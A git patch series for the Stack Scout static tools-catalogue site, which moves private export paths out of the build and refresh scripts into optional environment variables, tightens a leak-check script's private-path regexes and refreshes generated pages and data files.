From 58db4564cbe828d691e7a0955febc4b3d759b4e7 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Thu, 4 Jun 2026 05:31:21 +0100 Subject: [PATCH 1/5] fix: remove Stack Scout local path coupling --- .env.example | 5 ++++ .gitignore | 2 ++ README.md | 10 ++++---- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +-- data/collections-manifest.json | 4 +-- data/methodology-manifest.json | 4 +-- data/page-registry.json | 2 +- data/radar-manifest.json | 4 +-- data/tools-manifest.json | 4 +-- data/updates-manifest.json | 4 +-- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 24 +++++++----------- scripts/refresh-stackscout.ps1 | 40 ++++++++++++++++-------------- service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 41 files changed, 84 insertions(+), 81 deletions(-) create mode 100644 .env.example diff --git a/.env.example b/.env.example new file mode 100644 index 0000000..4096273 --- /dev/null +++ b/.env.example @@ -0,0 +1,5 @@ +# Optional local-only export targets. +# Leave unset in public CI and ordinary GitHub Pages builds. +STACKSCOUT_PRIVATE_EXPORT_DIR= +STACKSCOUT_PRIVATE_EXPORT_FILE= +STACKSCOUT_PRIVATE_STATUS_DIR= diff --git a/.gitignore b/.gitignore index 4bfa471..2a5cba6 100644 --- a/.gitignore +++ b/.gitignore @@ -10,6 +10,8 @@ planning-local/ .local-notes/ # Local screenshots and scratch files +.serve.log +.serve.err.log tmp-*.png tmp-*.jpg tmp-*.jpeg diff --git a/README.md b/README.md index 4a807b4..37303ba 100644 --- a/README.md +++ b/README.md @@ -2,12 +2,12 @@ `stackscout` builds **Stack Scout**, the public-facing tools destination for curated builder tools, services, APIs, MCPs, and CLIs. -This repo remains the GitHub Pages implementation base, but the visible product is no longer a simple internal "Tools Hub" brochure. The private operational console stays separate in `W:\Repos\_local\surfaces\tools-hub-local`. +This repo remains the GitHub Pages implementation base, but the visible product is no longer a simple internal "Tools Hub" brochure. The private operational console stays outside this public repo. ## Public vs private - This repo is public-facing only. -- The local launcher, manager inbox, review evidence, session state, and leak-check operations belong in `tools-hub-local`. +- Local launchers, operations state, and review artefacts belong in the private local surface, not this repo. - Public content must stay safe for GitHub Pages and public browsing. - Do not rely on `.gitignore` alone to protect private data. Public output is generated from an allowlisted shared source layer. @@ -23,7 +23,7 @@ These source files drive: - public manifests in `data/` - generated static pages across the public site -- a private preview export written to `W:\Repos\_local\surfaces\tools-hub-local\data\stackscout-publishing.json` +- an optional private preview export when `STACKSCOUT_PRIVATE_EXPORT_DIR` or `STACKSCOUT_PRIVATE_EXPORT_FILE` is set locally ## Build @@ -68,9 +68,9 @@ Before a public refresh, bump `CACHE_NAME` in `service-worker.js` when generated npm run refresh:site ``` -This runs the site build, runs checks, and writes private refresh status to `W:\Repos\_local\surfaces\tools-hub-local\data\stackscout-refresh-status.json`. +This runs the site build, runs checks, and optionally writes private refresh status when `STACKSCOUT_PRIVATE_STATUS_DIR` is set locally. -For unattended Windows refreshes without visible terminal focus theft, use the local-only launcher at `W:\Repos\_My Tools\LOCAL-ONLY\stackscout-refresh\run-stackscout-refresh.cmd`. +For unattended Windows refreshes without visible terminal focus theft, use a local-only launcher outside this public repo and set the optional private export/status environment variables there. ## Site structure diff --git a/catalog/index.html b/catalog/index.html index 5c4a8e6..6afa345 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

SyncPad

diff --git a/categories/apis/index.html b/categories/apis/index.html index 145d11d..4175a4c 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

Anthropic API

diff --git a/categories/clis/index.html b/categories/clis/index.html index c1f4070..81b6211 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

Wrangler

diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index 5391e8e..c98a026 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

SyncPad

diff --git a/categories/index.html b/categories/index.html index 70bbb47..c9acbbd 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

Desktop Apps

diff --git a/categories/mcps/index.html b/categories/mcps/index.html index 8a410de..f862d74 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

Playwright MCP

diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index a756d06..cb3bc04 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

Strudel Studio

diff --git a/categories/web-services/index.html b/categories/web-services/index.html index 56ff97d..cf70f1a 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

Make

diff --git a/categories/websites/index.html b/categories/websites/index.html index 2107b21..999627d 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

Hugging Face

diff --git a/collections/index.html b/collections/index.html index c4ad6eb..ae64571 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

From the Stack Scout Lab

diff --git a/data/categories-manifest.json b/data/categories-manifest.json index dc7e493..78826b4 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index 0e6d713..c6f8013 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "collections": [ { "slug": "creator-stack", diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index 5cf7354..f57652d 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/page-registry.json b/data/page-registry.json index e4ba728..33a29ae 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-05-25", + "generatedAt": "2026-06-04", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 2c299ca..7d7a77b 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index 28fa7b6..dee2917 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 4ae33c6..779cf1b 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ccc9d71..ec7781b 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

From the Stack Scout Lab

diff --git a/method/index.html b/method/index.html index 8b44939..aa83e0d 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

Verdict language

diff --git a/radar/index.html b/radar/index.html index aad5067..4bc907f 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

GitHub skills ecosystem

diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index 250398c..d390a74 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -4,10 +4,6 @@ const path = require('path') const ROOT_DIR = path.resolve(__dirname, '..') const SOURCE_DIR = path.join(ROOT_DIR, 'content', 'stackscout') const DATA_DIR = path.join(ROOT_DIR, 'data') -const PRIVATE_PREVIEW_EXPORT_CANDIDATES = [ - 'W:\\Repos\\_local\\surfaces\\tools-hub-local\\data\\stackscout-publishing.json', - '\\\\nas_storage_1\\Workspaces\\Repos\\_local\\surfaces\\tools-hub-local\\data\\stackscout-publishing.json', -] const BUILD_NOW = new Date() const GENERATED_AT = BUILD_NOW.toISOString().slice(0, 10) const GENERATED_AT_ISO = BUILD_NOW.toISOString() @@ -54,17 +50,16 @@ function writeExternalJson(absolutePath, value) { fs.writeFileSync(absolutePath, `${JSON.stringify(value, null, 2)}\n`, 'utf8') } -function resolveWritableExternalPath(candidates) { - for (const candidate of candidates) { - try { - ensureParent(candidate) - return candidate - } catch (error) { - continue - } +function resolvePrivatePreviewExportPath() { + if (process.env.STACKSCOUT_PRIVATE_EXPORT_FILE) { + return path.resolve(process.env.STACKSCOUT_PRIVATE_EXPORT_FILE) } - throw new Error(`Unable to resolve writable external path from candidates: ${candidates.join(', ')}`) + if (process.env.STACKSCOUT_PRIVATE_EXPORT_DIR) { + return path.join(path.resolve(process.env.STACKSCOUT_PRIVATE_EXPORT_DIR), 'stackscout-publishing.json') + } + + return null } function escapeHtml(value) { @@ -1279,8 +1274,7 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo } function main() { - const privatePreviewExport = - process.platform === 'win32' ? resolveWritableExternalPath(PRIVATE_PREVIEW_EXPORT_CANDIDATES) : null + const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') const tools = readJson('tools-source.json') const updates = readJson('updates-source.json').sort((a, b) => b.publishedAt.localeCompare(a.publishedAt)) diff --git a/scripts/refresh-stackscout.ps1 b/scripts/refresh-stackscout.ps1 index fe3be49..cc072d6 100644 --- a/scripts/refresh-stackscout.ps1 +++ b/scripts/refresh-stackscout.ps1 @@ -6,29 +6,24 @@ param( $ErrorActionPreference = 'Stop' $repoRoot = (Resolve-Path (Join-Path $PSScriptRoot '..')).Path -$privateDataDirCandidates = @( - 'W:\Repos\_local\surfaces\tools-hub-local\data', - '\\nas_storage_1\Workspaces\Repos\_local\surfaces\tools-hub-local\data' -) -$privateDataDir = $null -foreach ($candidate in $privateDataDirCandidates) { - try { - if (-not (Test-Path $candidate)) { - New-Item -ItemType Directory -Path $candidate -Force | Out-Null - } +$privateDataDirInput = if ($env:STACKSCOUT_PRIVATE_STATUS_DIR) { + $env:STACKSCOUT_PRIVATE_STATUS_DIR +} elseif ($env:STACKSCOUT_PRIVATE_EXPORT_DIR) { + $env:STACKSCOUT_PRIVATE_EXPORT_DIR +} else { + $null +} - $privateDataDir = (Resolve-Path $candidate).Path - break - } catch { - continue +$privateDataDir = $null +if ($privateDataDirInput) { + if (-not (Test-Path $privateDataDirInput)) { + New-Item -ItemType Directory -Path $privateDataDirInput -Force | Out-Null } -} -if (-not $privateDataDir) { - throw 'Unable to resolve a writable private data directory for Stack Scout refresh status.' + $privateDataDir = (Resolve-Path $privateDataDirInput).Path } -$statusFile = Join-Path $privateDataDir 'stackscout-refresh-status.json' +$statusFile = if ($privateDataDir) { Join-Path $privateDataDir 'stackscout-refresh-status.json' } else { $null } $toolsManifestFile = Join-Path $repoRoot 'data\tools-manifest.json' $updatesManifestFile = Join-Path $repoRoot 'data\updates-manifest.json' $categoriesManifestFile = Join-Path $repoRoot 'data\categories-manifest.json' @@ -38,10 +33,13 @@ $durationStopwatch = [System.Diagnostics.Stopwatch]::StartNew() function Read-JsonFile { param( - [Parameter(Mandatory = $true)] [string]$Path ) + if (-not $Path) { + return $null + } + if (-not (Test-Path $Path)) { return $null } @@ -82,6 +80,10 @@ function Write-RefreshStatus { $payload[$entry.Key] = $entry.Value } + if (-not $statusFile) { + return + } + $directory = Split-Path -Parent $statusFile if (-not (Test-Path $directory)) { New-Item -ItemType Directory -Path $directory -Force | Out-Null diff --git a/service-worker.js b/service-worker.js index bcf97f5..9ff0fb2 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-05-25' +const CACHE_NAME = 'stackscout-2026-06-04' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 00f4859..9274b4a 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

n8n

diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index 30981ec..a333ebe 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

SyncPad

diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 4ce2c98..3206296 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

Wrangler

diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index 9729a00..cedcfb4 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

Wrangler

diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 5cec48b..8e6dee2 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

GitHub MCP Server

diff --git a/tools/make/index.html b/tools/make/index.html index b6ee64d..cb9981e 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 6bf8067..2b209f0 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index e4b7c25..b5b70ae 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

Playwright MCP

diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 56142c2..226bd85 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

OpenAI API

diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index 525d96f..d2b6b07 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index 890b1a4..df9fb37 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

Strudel Studio

diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index e3f09bb..dbd10d1 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

OpenAI API

diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index 8506e6e..a5b9964 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

Canvas Planner

diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 6f22718..2bf1dc5 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

Playwright MCP

diff --git a/updates/index.html b/updates/index.html index fdc4b3e..a824e2d 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

Wrangler 4.58.0 improved command grouping and auth ergonomics

From 3ffb111f68891cc42a443077a0356795a85c2422 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:33:29 +0100 Subject: [PATCH 2/5] fix: narrow launch-safety private path checks --- scripts/verify-launch-safety.js | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/scripts/verify-launch-safety.js b/scripts/verify-launch-safety.js index 282dedd..e7a3b97 100644 --- a/scripts/verify-launch-safety.js +++ b/scripts/verify-launch-safety.js @@ -45,9 +45,10 @@ const REQUIRED_PUBLIC_FILES = [ ] const TEXT_EXTENSIONS = new Set(['.css', '.html', '.js', '.json', '.svg', '.txt', '.xml']) const PRIVATE_PATTERNS = [ - { label: 'Windows drive path', pattern: /\b[A-Z]:[\\/][^\s"'<>)]*/i }, - { label: 'UNC path', pattern: /\\\\[A-Za-z0-9._-]+[\\/][^\s"'<>)]*/i }, - { label: 'local-only surface marker', pattern: /\b(?:tools-hub-local|LOCAL-ONLY|_local)\b/i }, + { label: 'Kol Windows user path', pattern: /\b[A-Z]:[\\/]Users[\\/](?:koltregaskes|kolin)[\\/][^\s"'<>)]*/i }, + { label: 'W drive estate path', pattern: /\bW:[\\/][^\s"'<>)]*/i }, + { label: 'estate UNC path', pattern: /\\\\(?:\?\\)?(?:nas_storage_1|MINI-PC|localhost|127\.0\.0\.1)[\\/][^\s"'<>)]*/i }, + { label: 'local-only surface marker', pattern: /\b(?:tools-hub-local|LOCAL-ONLY|_local)\b/ }, { label: 'private operations wording', pattern: /\b(?:manager inbox|review evidence|session state)\b/i }, ] const REQUIRED_GITIGNORE_PATTERNS = ['.env', '.env.*', '*.local.md', '.local/', 'local-hub/'] From 52fed771d49f5337a14e3256f26d97ce92a0243b Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:40:59 +0100 Subject: [PATCH 3/5] fix: refresh service worker cache during build --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +- data/collections-manifest.json | 4 +- data/digest-2026-03-15.md | 23 +++ data/digest-2026-03-16.md | 53 ++++++ data/digest-2026-03-17.md | 107 +++++++++++ data/digest-2026-03-18.md | 71 ++++++++ data/digest-2026-03-19.md | 39 ++++ data/digest-2026-03-20.md | 45 +++++ data/digest-2026-03-21.md | 49 +++++ data/digest-2026-03-22.md | 49 +++++ data/digest-2026-03-23.md | 25 +++ data/digest-2026-03-24.md | 65 +++++++ data/digest-2026-03-25.md | 53 ++++++ data/digest-2026-03-26.md | 51 ++++++ data/digest-2026-03-27.md | 35 ++++ data/digest-2026-03-28.md | 29 +++ data/digest-2026-03-29.md | 23 +++ data/digest-2026-03-30.md | 19 ++ data/digest-2026-03-31.md | 125 +++++++++++++ data/digest-2026-04-01.md | 95 ++++++++++ data/digest-2026-04-02.md | 71 ++++++++ data/digest-2026-04-03.md | 47 +++++ data/digest-2026-04-04.md | 39 ++++ data/digest-2026-04-05.md | 125 +++++++++++++ data/digest-2026-04-06.md | 119 ++++++++++++ data/digest-2026-04-07.md | 125 +++++++++++++ data/digest-2026-04-08.md | 125 +++++++++++++ data/digest-2026-04-09.md | 123 +++++++++++++ data/digest-2026-04-10.md | 123 +++++++++++++ data/digest-2026-04-11.md | 125 +++++++++++++ data/digest-2026-04-12.md | 83 +++++++++ data/digest-2026-04-14.md | 125 +++++++++++++ data/digest-2026-04-15.md | 125 +++++++++++++ data/digest-2026-04-16.md | 123 +++++++++++++ data/digest-2026-04-17.md | 123 +++++++++++++ data/digest-2026-04-18.md | 125 +++++++++++++ data/digest-2026-04-19.md | 119 ++++++++++++ data/digest-2026-04-20.md | 123 +++++++++++++ data/digest-2026-04-21.md | 126 +++++++++++++ data/digest-2026-04-22.md | 117 ++++++++++++ data/digest-2026-04-23.md | 103 +++++++++++ data/digest-2026-04-25.md | 125 +++++++++++++ data/digest-2026-04-26.md | 127 +++++++++++++ data/digest-2026-04-27.md | 125 +++++++++++++ data/digest-2026-04-28.md | 123 +++++++++++++ data/digest-2026-04-29.md | 125 +++++++++++++ data/digest-2026-04-30.md | 117 ++++++++++++ data/digest-2026-05-01.md | 123 +++++++++++++ data/digest-2026-05-02.md | 125 +++++++++++++ data/digest-2026-05-03.md | 123 +++++++++++++ data/digest-2026-05-04.md | 125 +++++++++++++ data/digest-2026-05-05.md | 125 +++++++++++++ data/digest-2026-05-06.md | 123 +++++++++++++ data/digest-2026-05-07.md | 123 +++++++++++++ data/digest-2026-05-08.md | 125 +++++++++++++ data/digest-2026-05-09.md | 123 +++++++++++++ data/digest-2026-05-10.md | 125 +++++++++++++ data/digest-2026-05-11.md | 123 +++++++++++++ data/digest-2026-05-12.md | 125 +++++++++++++ data/digest-2026-05-13.md | 125 +++++++++++++ data/digest-2026-05-14.md | 125 +++++++++++++ data/digest-2026-05-15.md | 123 +++++++++++++ data/digest-2026-05-16.md | 123 +++++++++++++ data/digest-2026-05-17.md | 125 +++++++++++++ data/digest-2026-05-18.md | 125 +++++++++++++ data/digest-2026-05-19.md | 117 ++++++++++++ data/digest-2026-05-20.md | 107 +++++++++++ data/digest-2026-05-21.md | 119 ++++++++++++ data/digest-2026-05-22.md | 117 ++++++++++++ data/digest-2026-05-23.md | 121 ++++++++++++ data/digest-2026-05-24.md | 125 +++++++++++++ data/digest-2026-05-25.md | 123 +++++++++++++ data/digest-2026-05-26.md | 121 ++++++++++++ data/digest-2026-05-27.md | 123 +++++++++++++ data/digest-2026-05-28.md | 121 ++++++++++++ data/digest-2026-05-29.md | 111 +++++++++++ data/digest-2026-05-30.md | 103 +++++++++++ data/digest-2026-05-31.md | 11 ++ data/digest-2026-06-01.md | 35 ++++ data/digest-2026-06-02.md | 29 +++ data/digest-2026-06-03.md | 41 +++++ data/digest-2026-06-04.md | 35 ++++ data/digest-2026-06-05.md | 35 ++++ data/digest-2026-06-06.md | 5 + data/methodology-manifest.json | 4 +- data/news-feed-2026-03-15.json | 55 ++++++ data/news-feed-2026-03-16.json | 134 ++++++++++++++ data/news-feed-2026-03-17.json | 237 ++++++++++++++++++++++++ data/news-feed-2026-03-18.json | 160 ++++++++++++++++ data/news-feed-2026-03-19.json | 87 +++++++++ data/news-feed-2026-03-20.json | 102 +++++++++++ data/news-feed-2026-03-21.json | 115 ++++++++++++ data/news-feed-2026-03-22.json | 115 ++++++++++++ data/news-feed-2026-03-23.json | 55 ++++++ data/news-feed-2026-03-24.json | 145 +++++++++++++++ data/news-feed-2026-03-25.json | 115 ++++++++++++ data/news-feed-2026-03-26.json | 119 ++++++++++++ data/news-feed-2026-03-27.json | 87 +++++++++ data/news-feed-2026-03-28.json | 70 +++++++ data/news-feed-2026-03-29.json | 55 ++++++ data/news-feed-2026-03-30.json | 40 ++++ data/news-feed-2026-03-31.json | 271 +++++++++++++++++++++++++++ data/news-feed-2026-04-01.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-02.json | 181 ++++++++++++++++++ data/news-feed-2026-04-03.json | 119 ++++++++++++ data/news-feed-2026-04-04.json | 87 +++++++++ data/news-feed-2026-04-05.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-04-06.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-07.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-08.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-04-09.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-10.json | 245 +++++++++++++++++++++++++ data/news-feed-2026-04-11.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-12.json | 168 +++++++++++++++++ data/news-feed-2026-04-14.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-04-15.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-04-16.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-04-17.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-18.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-19.json | 245 +++++++++++++++++++++++++ data/news-feed-2026-04-20.json | 251 +++++++++++++++++++++++++ data/news-feed-2026-04-21.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-04-22.json | 247 +++++++++++++++++++++++++ data/news-feed-2026-04-23.json | 207 +++++++++++++++++++++ data/news-feed-2026-04-25.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-26.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-04-27.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-28.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-04-29.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-04-30.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-05-01.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-05-02.json | 273 ++++++++++++++++++++++++++++ data/news-feed-2026-05-03.json | 247 +++++++++++++++++++++++++ data/news-feed-2026-05-04.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-05.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-05-06.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-07.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-08.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-05-09.json | 257 ++++++++++++++++++++++++++ data/news-feed-2026-05-10.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-05-11.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-12.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-13.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-14.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-15.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-16.json | 275 ++++++++++++++++++++++++++++ data/news-feed-2026-05-17.json | 267 +++++++++++++++++++++++++++ data/news-feed-2026-05-18.json | 273 ++++++++++++++++++++++++++++ data/news-feed-2026-05-19.json | 275 ++++++++++++++++++++++++++++ data/news-feed-2026-05-20.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-05-21.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-22.json | 257 ++++++++++++++++++++++++++ data/news-feed-2026-05-23.json | 251 +++++++++++++++++++++++++ data/news-feed-2026-05-24.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-05-25.json | 279 ++++++++++++++++++++++++++++ data/news-feed-2026-05-26.json | 283 +++++++++++++++++++++++++++++ data/news-feed-2026-05-27.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-05-28.json | 271 +++++++++++++++++++++++++++ data/news-feed-2026-05-29.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-30.json | 243 +++++++++++++++++++++++++ data/news-feed-2026-05-31.json | 25 +++ data/news-feed-2026-06-01.json | 85 +++++++++ data/news-feed-2026-06-02.json | 72 ++++++++ data/news-feed-2026-06-03.json | 102 +++++++++++ data/news-feed-2026-06-04.json | 86 +++++++++ data/news-feed-2026-06-05.json | 84 +++++++++ data/news-feed-2026-06-06.json | 6 + data/news-feed-latest.json | 6 + data/page-registry.json | 2 +- data/radar-manifest.json | 4 +- data/tools-manifest.json | 4 +- data/updates-manifest.json | 4 +- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 ++ service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 202 files changed, 24944 insertions(+), 42 deletions(-) create mode 100644 data/digest-2026-03-15.md create mode 100644 data/digest-2026-03-16.md create mode 100644 data/digest-2026-03-17.md create mode 100644 data/digest-2026-03-18.md create mode 100644 data/digest-2026-03-19.md create mode 100644 data/digest-2026-03-20.md create mode 100644 data/digest-2026-03-21.md create mode 100644 data/digest-2026-03-22.md create mode 100644 data/digest-2026-03-23.md create mode 100644 data/digest-2026-03-24.md create mode 100644 data/digest-2026-03-25.md create mode 100644 data/digest-2026-03-26.md create mode 100644 data/digest-2026-03-27.md create mode 100644 data/digest-2026-03-28.md create mode 100644 data/digest-2026-03-29.md create mode 100644 data/digest-2026-03-30.md create mode 100644 data/digest-2026-03-31.md create mode 100644 data/digest-2026-04-01.md create mode 100644 data/digest-2026-04-02.md create mode 100644 data/digest-2026-04-03.md create mode 100644 data/digest-2026-04-04.md create mode 100644 data/digest-2026-04-05.md create mode 100644 data/digest-2026-04-06.md create mode 100644 data/digest-2026-04-07.md create mode 100644 data/digest-2026-04-08.md create mode 100644 data/digest-2026-04-09.md create 